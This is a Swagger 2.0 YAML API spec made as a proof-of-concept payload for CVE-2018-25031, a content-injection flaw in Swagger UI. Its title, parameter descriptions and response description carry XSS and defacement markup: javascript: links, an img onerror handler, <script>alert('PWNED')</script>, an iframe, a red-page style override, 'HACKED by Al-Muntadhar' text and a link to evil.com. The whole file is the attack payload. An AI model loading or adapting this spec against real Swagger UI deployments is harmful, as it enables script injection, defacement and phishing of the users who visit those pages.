---
swagger: '2.0'
info:
  title: Exploited by <a href="javascript:alert();">Al-Muntadhar</a> - HACKED <img src=x onerror="alert()" />
  description: |
    CVE-2018-25031 

  version: production
basePath: /fakeapi/almuntadhar
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/almuntadhar":
    get:
      responses:
        '200':
          description:  You are interacting with the victims api
      tags:
      - EZ
      operationId: findAccounts
      summary: this is example text 
  "/almuntadhar_delete":
    delete:
      parameters:
      - description: |
           <a href="javascript:alert();"CLICKME</a><a href="//evil.com">CLICKME</a>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: CVE-2018-25031
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description:  <h1>HACKED</h1><script>alert('PWNED')</script><img src='https://i.imgur.com/DUlJv6y.png' /><a href='https://hackerone.com/almuntadhar'>Click Me</a><marquee>Exploited</marquee><style>body{background:red;color:white}</style><input type='text' value='Hacked by Al-Muntadhar'><video src='https://www.w3schools.com/html/mov_bbb.mp4' controls></video><audio src='https://www.w3schools.com/html/horse.mp3' controls></audio><iframe src='https://example.com'></iframe><b>Bolded</b><i>Italic</i><u>Underline</u><code>code</code><button>Click</button><select><option>1</option><option>2</option></select><textarea>textarea</textarea><details><summary>Details</summary>Info</details><table><tr><td>Cell</td></tr></table><blockquote>Quote</blockquote><q>Short Quote</q><pre>preformatted</pre><del>deleted</del><ins>inserted</ins><sub>subscript</sub><sup>superscript</sup><small>small</small><mark>marked</mark><div>div content</div><span>span content</span><label>label</label><fieldset><legend>Legend</legend></fieldset><meter value='0.5'>50%</meter><progress value='70' max='100'>70%</progress><time datetime='2025-04-09'>Today</time><abbr title='CVE'>CVE</abbr><address>0xAl-Muntadhar</address><bdi>BDI</bdi><bdo dir='rtl'>Reversed</bdo><canvas>Canvas</canvas><caption>Caption</caption><cite>Cite</cite><colgroup><col span='2' style='background-color:yellow'></colgroup><dfn>Definition</dfn><dl><dt>Term</dt><dd>Definition</dd></dl><em>Emphasized</em><figcaption>Figcaption</figcaption><figure>Figure</figure><footer>Footer</footer><header>Header</header><hr><kbd>Ctrl+C</kbd><main>Main</main><nav>Nav</nav><noscript>NoScript</noscript><object data='data.swf'></object><optgroup label='Group'><option>1</option></optgroup><output>Output</output><param name='autoplay' value='true'><ruby>漢<rt>Kanji</rt></ruby><s>S tag</s><samp>Sample</samp><section>Section</section><source src='video.mp4'><strong>Strong</strong><summary>Summary</summary><track src='subtitles.vtt'><var>Var</var><wbr>
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description:  <h1>HACKED</h1><script>alert('PWNED')</script><img src='https://i.imgur.com/DUlJv6y.png' /><a href='https://hackerone.com/almuntadhar'>Click Me</a><marquee>Exploited</marquee><style>body{background:red;color:white}</style><input type='text' value='Hacked by Al-Muntadhar'><video src='https://www.w3schools.com/html/mov_bbb.mp4' controls></video><audio src='https://www.w3schools.com/html/horse.mp3' controls></audio><iframe src='https://example.com'></iframe><b>Bolded</b><i>Italic</i><u>Underline</u><code>code</code><button>Click</button><select><option>1</option><option>2</option></select><textarea>textarea</textarea><details><summary>Details</summary>Info</details><table><tr><td>Cell</td></tr></table><blockquote>Quote</blockquote><q>Short Quote</q><pre>preformatted</pre><del>deleted</del><ins>inserted</ins><sub>subscript</sub><sup>superscript</sup><small>small</small><mark>marked</mark><div>div content</div><span>span content</span><label>label</label><fieldset><legend>Legend</legend></fieldset><meter value='0.5'>50%</meter><progress value='70' max='100'>70%</progress><time datetime='2025-04-09'>Today</time><abbr title='CVE'>CVE</abbr><address>0xAl-Muntadhar</address><bdi>BDI</bdi><bdo dir='rtl'>Reversed</bdo><canvas>Canvas</canvas><caption>Caption</caption><cite>Cite</cite><colgroup><col span='2' style='background-color:yellow'></colgroup><dfn>Definition</dfn><dl><dt>Term</dt><dd>Definition</dd></dl><em>Emphasized</em><figcaption>Figcaption</figcaption><figure>Figure</figure><footer>Footer</footer><header>Header</header><hr><kbd>Ctrl+C</kbd><main>Main</main><nav>Nav</nav><noscript>NoScript</noscript><object data='data.swf'></object><optgroup label='Group'><option>1</option></optgroup><output>Output</output><param name='autoplay' value='true'><ruby>漢<rt>Kanji</rt></ruby><s>S tag</s><samp>Sample</samp><section>Section</section><source src='video.mp4'><strong>Strong</strong><summary>Summary</summary><track src='subtitles.vtt'><var>Var</var><wbr>
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
